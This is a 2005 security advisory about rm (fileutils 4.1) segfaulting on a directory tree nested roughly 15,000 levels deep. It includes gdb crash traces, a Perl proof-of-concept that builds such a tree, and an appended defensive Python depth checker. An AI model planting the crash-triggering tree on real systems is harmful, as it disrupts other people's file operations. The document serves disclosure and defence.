Thu Aug 25 20:53:05 BRT 2005

Original advisory: http://nutshell.gotfault.net/papers/adv_rm.txt

Summary: rm gets SIGSEGV while trying to remove a very large directory tree, about 14986 sub-directories or more.

Bug discovered by nuTshell

Vulnerable versions: rm (fileutils) 4.1, maybe lower or higher
Immune versions: rm (coreutils) 5.2.1
Solution: Upgrade to rm (coreutils) 5.2.1

When rm'ing a huge directory tree with about 14986 sub-directories, the behavior differs depending on whether a few more sub-directories are added or removed. On my system I have seen these two behaviors:

$ gdb -q /bin/rm
(no debugging symbols found)...(gdb)
(gdb) r -rf A
Starting program: /bin/rm -rf A
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0xb7e880dc in __lxstat64 () from /lib/libc.so.6
(gdb) i r
eax            0xbf711138       -1083109064
ecx            0x804d820        134535200
edx            0x0      0
ebx            0x0      0
esp            0xbf711000       0xbf711000
ebp            0xbf711088       0xbf711088
esi            0x809c1fb        134857211
edi            0x80a6c70        134900848
eip            0xb7e880dc       0xb7e880dc
eflags         0x10286  66182
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x0      0
fctrl          0x37f    895
fstat          0x20     32
ftag           0xffff   65535
fiseg          0x73     115
fioff          0x804b728        134526760
foseg          0x7b     123
fooff          0x804d828        134535208
fop            0x6d9    1753
mxcsr          0x1f80   8064
orig_eax       0xffffffff       -1
(gdb)

In another test I got:

$ gdb -q /bin/rm
(no debugging symbols found)...(gdb)
(gdb) r -rf A
Starting program: /bin/rm -rf A
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x08049fc4 in strcpy ()
(gdb) i r
eax            0xbfaa5850       -1079355312
ecx            0x8051060        134549600
edx            0x0      0
ebx            0x0      0
esp            0xbf2a6000       0xbf2a6000
ebp            0xbf2a6118       0xbf2a6118
esi            0x809eb93        134867859
edi            0x80dfca8        135134376
eip            0x8049fc4        0x8049fc4
eflags         0x10283  66179
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x0      0
fctrl          0x37f    895
fstat          0x20     32
ftag           0xffff   65535
fiseg          0x73     115
fioff          0x804b728        134526760
foseg          0x7b     123
fooff          0x804d828        134535208
fop            0x6d9    1753
mxcsr          0x1f80   8064
orig_eax       0xffffffff       -1
(gdb)

Maybe it is possible to execute arbitrary code in special situations (local or remote).

The code I used to test these situations is attached below:

----- cut here -----
#!/usr/bin/perl
# Code that gets Segmentation fault from rm
# while trying to remove huge directory tree
# by nuTshell

# Optional argument: number of extra 20-level chunks (default 15)
$end = shift or $end = 15;

# Check that the current directory is writable
mkdir("./Z") or die "Cannot create dir: $!\n";
system("/bin/rmdir ./Z");

# 409 nested "A/" components per mkdir -p call
$changing = 2045 / 5;
$dir2 = "A/"x$changing;

print "Wait while $0 create directory tree...\n";

# 36 chunks of 409 levels each, descending after every chunk
for ($xix=0;$xix<36;$xix++) {
    system("mkdir -p $dir2");
    chdir("$dir2");
}

# Then $end further chunks of 20 levels each
$dir2 = "A/"x20;
for ($ipsilon=0;$ipsilon<$end;$ipsilon++) {
    $xix++;
    system("mkdir -p $dir2");
    chdir("$dir2");
}

print "Done, try rm -rf A\n";
#eof
----- cut here -----
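
A defensive check for the condition described above, added here as an example and not part of the original advisory: it measures how deeply a directory tree is nested so that an oversized tree can be flagged before an affected rm is run on it. The names max_dir_depth and ADVISORY_DEPTH and the script name in the usage comment are hypothetical; the code assumes a POSIX system and that nothing else modifies the tree during the walk.

```python
import os
import sys

# Figure from the advisory: rm (fileutils) 4.1 crashed at about this nesting depth.
ADVISORY_DEPTH = 14986

def _subdirs():
    """Names of real sub-directories of the current directory (symlinks skipped)."""
    with os.scandir(".") as it:
        return [e.name for e in it if e.is_dir(follow_symlinks=False)]

def max_dir_depth(root, limit=None):
    """Nesting depth of the deepest directory under root (root itself counts as 1).

    Uses a heap-allocated stack and relative chdir() calls, so the walk needs
    neither recursion nor full path names. With limit set, it returns as soon
    as the depth exceeds limit.
    """
    saved = os.open(".", os.O_RDONLY)      # to restore the caller's cwd
    try:
        os.chdir(root)
        stack = [_subdirs()]               # pending child names, one list per level
        deepest = 1
        while stack:
            if stack[-1]:
                os.chdir(stack[-1].pop())  # descend one level
                stack.append(_subdirs())
                deepest = max(deepest, len(stack))
                if limit is not None and deepest > limit:
                    return deepest
            else:
                stack.pop()                # level finished, go back up
                if stack:
                    os.chdir("..")
        return deepest
    finally:
        os.fchdir(saved)
        os.close(saved)

if __name__ == "__main__":
    # Hypothetical usage: python depthcheck.py DIR [MAX_DEPTH]
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    limit = int(sys.argv[2]) if len(sys.argv) > 2 else ADVISORY_DEPTH - 1
    depth = max_dir_depth(target, limit)
    if depth > limit:
        print(f"{target}: nesting exceeds {limit} levels; upgrade to rm (coreutils) 5.2.1 before removing it")
        sys.exit(1)
    print(f"{target}: deepest nesting is {depth} levels")
```
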